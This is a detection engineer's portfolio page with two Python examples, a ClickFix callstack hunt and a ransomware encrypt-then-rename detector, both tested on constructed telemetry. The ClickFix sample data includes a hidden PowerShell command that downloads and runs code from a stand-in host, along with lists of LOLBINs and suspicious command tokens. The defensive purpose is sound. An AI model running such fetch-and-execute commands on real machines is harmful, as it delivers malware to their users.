I find what automated tools miss, turn threat intelligence into high-fidelity detections, and build security operations from scratch. Currently engineering detection coverage across 1,300+ Sigma rules and custom detections at Secnap Network Security.
Proactive hypothesis-driven hunts across endpoint, cloud, and identity environments. I dig through raw telemetry to find what automated tools miss — from VPN compromises to FIDO downgrade attacks.
Designing and tuning high-fidelity detection rules mapped to MITRE ATT&CK. From Sigma rules to custom LimaCharlie detections, I build coverage that catches real threats without drowning the SOC in noise.
SOC platforms, criticality scoring, workflow systems, threat timelines — I've orchestrated the build of entire security operations infrastructure in a lean startup environment where nothing existed before.
Detected a ClickFix attack through callstack analysis — explorer.exe with shell32.dll launching untrusted processes. Caught it before NetSupport RAT could establish persistence. Built a detection rule to catch this pattern across all customer environments.
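The callstack pattern described above, as an added illustration that is not code from this page or from the author's detection platform: a small Python hunt over constructed process-creation events, modelled loosely on the fields an EDR exposes (parent image, child image, command line, signature status, and the creating thread's callstack). The pattern fires only when explorer.exe is the parent, a shell32.dll frame is on the callstack, and the child is untrusted (unsigned, outside a trusted directory, or a LOLBIN launched with a suspicious command line). The event shape, callstack frame strings, trusted-directory list, LOLBIN list and suspicious-token list are all assumptions for the example and would be tuned to real telemetry.

```python
# Added example: callstack-based ClickFix hunt over constructed process events.
# Event fields, frame strings and tuning lists are assumptions, not a vendor schema.
from dataclasses import dataclass, field

# Binaries ClickFix lures typically make the victim paste into the Win+R dialog (assumed list).
LOLBINS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "curl.exe",
           "wscript.exe", "cscript.exe", "msiexec.exe", "rundll32.exe"}
# Directories whose signed binaries we treat as trusted (assumed; extend per environment).
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
# Command-line tokens that make a LOLBin launch from the Run dialog worth an alert (assumed).
SUSPICIOUS_CMD = ("http", "iex", "invoke-expression", "-enc", "frombase64", "mshta")


@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str
    signed: bool
    callstack: list[str] = field(default_factory=list)  # "module!function", innermost first


def _basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def untrusted_reason(ev: ProcEvent):
    """Return why the child process is untrusted, or None if it looks benign."""
    img = ev.image.lower()
    if not ev.signed:
        return "unsigned binary"
    if not img.startswith(TRUSTED_DIRS):
        return "signed but outside trusted directories"
    if _basename(img) in LOLBINS and any(tok in ev.command_line.lower() for tok in SUSPICIOUS_CMD):
        return "lolbin with suspicious command line"
    return None


def is_clickfix_candidate(ev: ProcEvent):
    """explorer.exe launching an untrusted child through shell32.dll (ShellExecute path)."""
    if _basename(ev.parent_image) != "explorer.exe":
        return None
    if not any(f.lower().startswith("shell32.dll!") for f in ev.callstack):
        return None
    return untrusted_reason(ev)


def hunt(events):
    """Return one finding per event matching the ClickFix callstack pattern."""
    findings = []
    for ev in events:
        reason = is_clickfix_candidate(ev)
        if reason:
            findings.append({"image": ev.image, "command_line": ev.command_line,
                             "reason": reason, "attack": "T1204"})  # User Execution
    return findings


# Constructed sample telemetry (not real captures); frame names are illustrative only.
SHELL_STACK = ["kernelbase.dll!CreateProcessW", "shell32.dll!ShellExecuteExW", "explorer.exe!0x1a2b"]
PLAIN_STACK = ["kernelbase.dll!CreateProcessW", "cmd.exe!0x4c3d"]
SAMPLE_EVENTS = [
    # 1. Win+R paste: hidden PowerShell pulling a second stage -> fires
    ProcEvent("C:\\Windows\\explorer.exe",
              "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
              'powershell -w hidden -c "iex (irm http://example.invalid/a)"', True, SHELL_STACK),
    # 2. User opens Notepad from the Run dialog -> benign
    ProcEvent("C:\\Windows\\explorer.exe", "C:\\Windows\\System32\\notepad.exe",
              "notepad", True, SHELL_STACK),
    # 3. Unsigned dropper in a user-writable path -> fires
    ProcEvent("C:\\Windows\\explorer.exe", "C:\\Users\\bob\\AppData\\Local\\Temp\\update.exe",
              "update.exe /silent", False, SHELL_STACK),
    # 4. Same suspicious PowerShell but parent is cmd.exe, no shell32 frame -> out of scope here
    ProcEvent("C:\\Windows\\System32\\cmd.exe",
              "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
              'powershell -enc AAAA', True, PLAIN_STACK),
    # 5. Admin typing "cmd" into Run -> benign, keeps the rule from paging on every shell
    ProcEvent("C:\\Windows\\explorer.exe", "C:\\Windows\\System32\\cmd.exe",
              "cmd.exe", True, SHELL_STACK),
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f)
```

The fourth sample shows the scope of this particular rule: a suspicious PowerShell launch under cmd.exe is worth its own detection, but it is not the explorer.exe-plus-shell32.dll ClickFix path this hunt targets. The fifth sample is the usual false-positive source, a legitimate shell opened from the Run dialog, and is why plain LOLBin launches need the command-line condition.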
Discovered a threat actor with a 2-month undetected VPN compromise attempting Active Directory brute force. Developed a recurring hunt to address the detection gap and prevent similar compromises going forward.
Identified FIDO downgrade attacks in Azure Entra ID, malicious LNK files pointing to C2 servers, and infostealers like Chihuahua Stealer during proactive hunts across customer environments.
Created ransomware detection rules using File I/O patterns in Windows kernel events through Fibratus and ETW providers. Built kernel-level visibility where traditional EDR had blind spots.
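The File I/O pattern mentioned above, as an added example that is not the author's rule set and not Fibratus code: a Python detector over a constructed stream of kernel-style file events (WriteFile and RenameFile per process), which is the kind of event ETW file providers and Fibratus surface. The logic looks for the encrypt-then-rename signature of ransomware: one process writes a file and then, within a short window, renames it to a new extension, and does this to many files with the same new extension. Bulk renamers that never write content, and editors that write but do not change extensions, do not trip it. Event field names, the window, the threshold and the sample paths are assumptions for the example.

```python
# Added example: ransomware File I/O detector over constructed kernel file events.
# Field names, thresholds and sample paths are assumptions, not Fibratus/ETW schema.
import ntpath
from collections import defaultdict, deque
from dataclasses import dataclass

WINDOW_SECONDS = 10.0   # assumed: how long a write/rename burst is correlated
RENAME_THRESHOLD = 20   # assumed: extension-changing renames of self-written files per window


@dataclass
class FileEvent:
    ts: float        # seconds since trace start
    pid: int
    image: str
    op: str          # "WriteFile" or "RenameFile" (other ops are ignored)
    path: str
    new_path: str = ""   # only for RenameFile


class RansomwareDetector:
    """Stateful detector: feed events in time order, get an alert dict or None."""

    def __init__(self, window=WINDOW_SECONDS, threshold=RENAME_THRESHOLD):
        self.window = window
        self.threshold = threshold
        self.written = defaultdict(dict)    # pid -> {path: last write ts}
        self.renames = defaultdict(deque)   # pid -> deque of (ts, new_ext)
        self.alerted = set()

    def feed(self, ev: FileEvent):
        if ev.op == "WriteFile":
            self.written[ev.pid][ev.path.lower()] = ev.ts
            return None
        if ev.op != "RenameFile":
            return None
        src = ev.path.lower()
        old_ext = ntpath.splitext(src)[1]
        new_ext = ntpath.splitext(ev.new_path.lower())[1]
        # Only renames that change the extension count; in-place renames are normal app behaviour.
        if not new_ext or new_ext == old_ext:
            return None
        # Only files this same process wrote shortly before: encrypt, then rename.
        wrote_at = self.written[ev.pid].get(src)
        if wrote_at is None or ev.ts - wrote_at > self.window:
            return None
        dq = self.renames[ev.pid]
        dq.append((ev.ts, new_ext))
        while dq and ev.ts - dq[0][0] > self.window:
            dq.popleft()
        exts = {e for _, e in dq}
        if len(dq) >= self.threshold and len(exts) == 1 and ev.pid not in self.alerted:
            self.alerted.add(ev.pid)
            return {"pid": ev.pid, "image": ev.image, "extension": new_ext,
                    "renames_in_window": len(dq), "attack": "T1486"}  # Data Encrypted for Impact
        return None


def run(events):
    """Replay a sorted event list through the detector and collect alerts."""
    det = RansomwareDetector()
    return [a for a in (det.feed(e) for e in sorted(events, key=lambda e: e.ts)) if a]


def constructed_events():
    """Constructed sample trace (not a real capture)."""
    evs = []
    # Encryptor: write each document, then rename it to .locked, 25 files in ~5 s.
    enc = "C:\\Users\\bob\\AppData\\Roaming\\svc.exe"
    for i in range(25):
        doc = f"C:\\Users\\bob\\Documents\\report{i}.docx"
        evs.append(FileEvent(i * 0.2, 4242, enc, "WriteFile", doc))
        evs.append(FileEvent(i * 0.2 + 0.05, 4242, enc, "RenameFile", doc, doc + ".locked"))
    # Explorer: user renames three files by hand, no writes.
    for i in range(3):
        p = f"C:\\Users\\bob\\Desktop\\pic{i}.jpg"
        evs.append(FileEvent(1.0 + i, 100, "C:\\Windows\\explorer.exe", "RenameFile", p, p[:-4] + ".png"))
    # Bulk renamer: changes 30 extensions but never writes content.
    for i in range(30):
        p = f"C:\\Photos\\img{i}.jpg"
        evs.append(FileEvent(2.0 + i * 0.1, 300, "C:\\Tools\\bulkrename.exe", "RenameFile", p, p[:-4] + ".jpeg"))
    # Word: writes many temp files, never changes extensions.
    for i in range(40):
        evs.append(FileEvent(3.0 + i * 0.05, 200, "C:\\Program Files\\Office\\winword.exe",
                             "WriteFile", f"C:\\Users\\bob\\AppData\\Local\\Temp\\~tmp{i}.tmp"))
    return evs


if __name__ == "__main__":
    for alert in run(constructed_events()):
        print(alert)
```

Requiring a prior write from the same process is what gives the rule its fidelity: it is the encrypt-then-rename sequence, not renaming alone, that separates an encryptor from a batch renamer. The window and threshold are the knobs to tune against baseline file activity per host role.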